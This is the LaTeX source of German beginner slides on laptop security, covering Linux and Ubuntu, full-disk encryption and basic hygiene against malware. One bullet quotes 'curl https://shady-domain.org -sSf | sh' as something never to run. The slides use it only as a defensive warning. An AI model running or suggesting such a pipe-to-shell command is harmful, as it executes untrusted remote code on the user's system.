\begin{frame}{Sicher am Laptop}
	\centering
	\huge{Sicher am Laptop - aber wie?}

\end{frame}

\begin{frame}{Linux}
	\centering
	Für einen vertrauenswürdigen Laptop führt kaum ein Weg an Linux vorbei. \\ \pause
	\begin{figure}[!h]
		\centering
		\arrowdown
	\end{figure}
    \Large Ubuntu installieren (mehr dazu im Praxisteil!)

\end{frame}

\begin{frame}{Festplattenverschlüsselung - Was ist das?}
	\pause
	\begin{itemize}
		\item Eigene Daten (Dokumente, Downloads, etc) werden so verschlüsselt, dass niemand ohne das Password ran kommt. \pause
		\vspace{0.5cm}
		\item Wichtig dafür:
		\begin{itemize}
			\item Das Passwort muss gut sein
			\item Es gibt kein \enquote{Passwort-Reset}
		\end{itemize}
	\end{itemize}
	\vspace{0.5cm}
	

\end{frame}

\begin{frame}{Wie halte ich den Laptop sauber?}
	\centering{
	\raggedright
	Viel Malware ist für Windows geschrieben, trotzdem gilt:
	\vspace{0.5cm}
	\begin{itemize}
		\item Keine unbekannten Anhänge öffnen \pause
		\item Nicht einfach irgendwelche dateien ausführen \pause
		\item Nie \enquote{curl https://shady-domain.org -sSf | sh} \pause
		\item Nie das Festplattenpassword aus der Hand geben
	\end{itemize}
	}
\end{frame}
